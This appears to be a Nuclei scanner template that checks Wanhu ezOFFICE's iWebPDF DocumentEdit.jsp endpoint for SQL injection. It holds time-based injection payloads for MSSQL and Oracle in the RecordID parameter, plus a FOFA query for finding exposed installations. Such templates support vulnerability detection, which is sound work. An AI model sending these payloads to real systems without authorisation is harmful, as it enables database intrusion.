http:
    - matchers:
        - dsl:
            - status_code == 200 && duration>=3 && duration<=10
          name: mssql
          type: dsl
      raw:
        - |
          @timeout: 15s
          GET /defaultroot/public/iWebPDF/DocumentEdit.jsp;?RecordID=1%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
          Host: {{Hostname}}
    - matchers:
        - dsl:
            - status_code == 200 && duration>=3 && duration<=10
          name: oracle
          type: dsl
      raw:
        - |
          @timeout: 15s
          GET /defaultroot/public/iWebPDF/DocumentEdit.jsp;?RecordID=1%27%20AND%208611=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)%7C%7CCHR(86)%7C%7CCHR(109)%7C%7CCHR(79),6)-- HTTP/1.1
          Host: {{Hostname}}
id: wanhu-ezoffice-iwebpdf-documentedit-sqli
info:
    author: xiuxin
    metadata:
        fofa-query: app="万户网络-ezOFFICE"
        max-request: 2
        verified: true
    name: 万户documentedit接口存在SQL注入
    severity: high
    tags:
        - wanhu
        - ezoffice
        - 万户网络-ezOFFICE
        - ecor
        - ECOR
